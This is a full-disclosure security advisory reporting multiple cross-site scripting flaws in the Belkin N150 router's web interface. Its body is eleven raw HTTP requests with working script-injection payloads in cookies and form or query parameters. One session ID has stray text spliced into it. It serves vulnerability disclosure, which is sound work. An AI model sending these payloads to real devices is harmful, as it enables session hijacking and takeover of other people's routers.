## FULL DISCLOSURE #Product : Belkin N150 Home Router #Exploit Author : Rahul Pratap Singh #Home page Link : http://www.belkin.com #Linkedin : https://in.linkedin.com/in/rahulpratapsingh94 #Version : F9K1009 v1 #Firmware : 1.00.09 #Date : 24/Feb/2016 → Vulnerability/BUG Report : —————————————- Description: —————————————- Belkin N150 Home router is vulnerable to XSS vulnerability. Numerous parameters are not sanitized that leads to XSS. —————————————- Vulnerable Code: —————————————- https://0x62626262.files.wordpress.com/2016/02/belkinsessionxssvulcode.png https://0x62626262.files.wordpress.com/2016/02/belkinxsspocvulcode.png https://0x62626262.files.wordpress.com/2016/02/vul8.png —————————————- Exploit and Poc: —————————————- 1) GET /cgi-bin/webproc?getpage=html/top.html&var:page=deviceinfo HTTP/1.1 Host: 192.168.2.1 User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip,deflate DNT: 1 Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/index.html&var:page=deviceinfo Cookie: sessionid="></a><img src=x onerror=alert(1)><a; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT; language=en_us Connection: keep-alive https://0x62626262.files.wordpress.com/2016/02/belkinsessionxsspoc.png 2) POST /cgi-bin/webproc HTTP/1.1 Host: 192.168.2.1 User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip,deflate DNT: 1 Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=login Cookie: sessionid=3921960f; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 222 getpage=html%2Fpage.html&errorpage=< script>alert("xss")< /script>&var%3Apage=deviceinfo&var%3A errorpage=login&var%3Alogin=true&obj-action=auth&%3Ausername=admin&%3Apassword=eHNz&%3Ahostname=dGVjaG5v&%3A action=login&%3Asessionid=3921960f https://0x62626262.files.wordpress.com/2016/02/belkinxsspoc2.png 3) POST /cgi-bin/webproc HTTP/1.1 Host: 192.168.2.1 User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip,deflate DNT: 1 Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=login Cookie: sessionid=3921960f; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 238 getpage=html/page.html&errorpage=html/page.html&var:page="< /scRipt>< scRipt>prompt("xss")< /scRipt>< scRipt>& var:errorpage=login&var:login=true&obj-action=auth&:username=admin&:password=YWJj&:hostname=dGVjaG5v&:action=login&: sessionid=3921960f https://0x62626262.files.wordpress.com/2016/02/belkinxsspoc3.png 4) POST /cgi-bin/webproc HTTP/1.1 Host: 192.168.2.1 User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip,deflate DNT: 1 Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=login Cookie: sessionid=3921960f; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 245getpage=html/page.html&errorpage=html/page.html&var:page=deviceinfo&var:errorpage= "< /scRipt>< scRipt>prompt("xss")< /scRipt>< scRipt>&var:login=true&obj-action=auth&:username=admin&:password=YWJj&:hostname=dGVjaG5v&:action=login&: sessionid=3921960f https://0x62626262.files.wordpress.com/2016/02/belkinxsspoc4.png 5) GET /cgi-bin/webproc?getpage=< scRipt>prompt("xss")< /scRipt>&var:getpage=abc&var:language=en_us&var:page=login&var:oldpage =ut_firmware HTTP/1.1 Host: 192.168.2.1 User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip,deflate DNT: 1 Cookie: sessionid=3921960f; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT; language=en_us; expires=Sun, 15-May-2102 01:45:46 GMT Connection: keep-alive https://0x62626262.files.wordpress.com/2016/02/belkinxsspoc5.png 6) GET /cgi-bin/webproc?getpage=html/page.html&var:menu="< /scRipt>< scRipt>prompt("xss")< /scRipt>< scRipt>&var:page=login&var:subpage=-&var:errorpage=- HTTP/1.1 Host: 192.168.2.1 User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip,deflate DNT: 1 Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:menu=status&var:page=login&var:subpage=-&var:errorpage=- Cookie: sessionid=3921960f; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT; language=en_us; expires=Sun, 15-May-2102 01:45:46 GMT Connection: keep-alive https://0x62626262.files.wordpress.com/2016/02/belkinxsspoc6.png 7) GET /cgi-bin/webproc?getpage=html/page.html&var:menu=status&var:page=login&var:subpage="< /scRipt>< scRipt>prompt("xss")< /scRipt>< scRipt>& var:errorpage=- HTTP/1.1 Host: 192.168.2.1 User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip,deflate DNT: 1 Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:menu=status&var:page=login&; var:subpage=-&var:errorpage=- Cookie: sessionid=3921960f; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT; language=en_us; expires=Sun, 15-May-2102 01:45:46 GMT Connection: keep-alive https://0x62626262.files.wordpress.com/2016/02/belkinxsspoc7.png 8) GET /cgi-bin/webproc?getpage=html/page.html&var:tbsversion="< /scRipt>< scRipt>prompt("xss")< /scRipt>< scRipt>&var:page=login&var:subpage=-&var:errorpage=- HTTP/1.1 Host: 192.168.2.1 User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip,deflate DNT: 1 Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:menu=status&var:page=login&var:subpage=-&var:errorpage=- Cookie: sessionid=3921960f; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT; language=en_us; expires=Sun, 15-May-2102 01:45:46 GMT Connection: keep-alive https://0x62626262.files.wordpress.com/2016/02/belkinxsspoc8.png 9) POST /cgi-bin/webproc HTTP/1.1 Host: 192.168.2.1 User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip,deflate DNT: 1 Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=login Cookie: sessionid=3921960f; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 262 getpage=html/page.html&errorpage=html/page.html&var:CacheLastData="< /scRipt>< scRipt>prompt("xss")< /scRipt>< scRipt>& var:page=abc&var:errorpage=login&var:login=true&obj-action=auth&:username=admin&:password=YWJj&:hostname=dGVjaG5v&:action=login&: sessionid=3921960f https://0x62626262.files.wordpress.com/2016/02/belkinxsspoc9.png 10) POST /cgi-bin/webproc HTTP/1.1 Host: 192.168.2.1 User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip,deflate DNT: 1 Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=login Cookie: sessionid=392Multiple XSS Vulnerabilities1960f; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 262 getpage=html/page.html&errorpage=html/page.html&var:sys_UserLevel="< /scRipt>< scRipt>prompt("xss")< /scRipt>< scRipt>& var:page=abc&var:errorpage=login&var:login=true&obj-action=auth&:username=admin&:password=YWJj&:hostname=dGVjaG5v&:action=login&: sessionid=3921960f https://0x62626262.files.wordpress.com/2016/02/belkinxsspoc10.png 11) GET /cgi-bin/webproc?getpage=html/page.html&var:style="< /scRipt>< scRipt>prompt("xss")< /scRipt>< scRipt>&var:page=login&var:subpage=-&var:errorpage=- HTTP/1.1 Host: 192.168.2.1 User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip,deflate DNT: 1 Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:menu=status&var:page=login&var:subpage=-&var:errorpage=- Cookie: sessionid=3921960f; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT; language=en_us; expires=Sun, 15-May-2102 01:45:46 GMT Connection: keep-alive https://0x62626262.files.wordpress.com/2016/02/belkinxsspoc11.png Vulnerability Disclosure Timeline: → January 30, 2016 – Bug discovered, initial report to Belkin Security Team → February 24, 2016 – No response from vendor → February 24, 2016 – Full Disclosure [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.
Attachment:
0x9ACF7D5F.asc
Description: application/pgp-keys
Attachment:
signature.asc
Description: OpenPGP digital signature
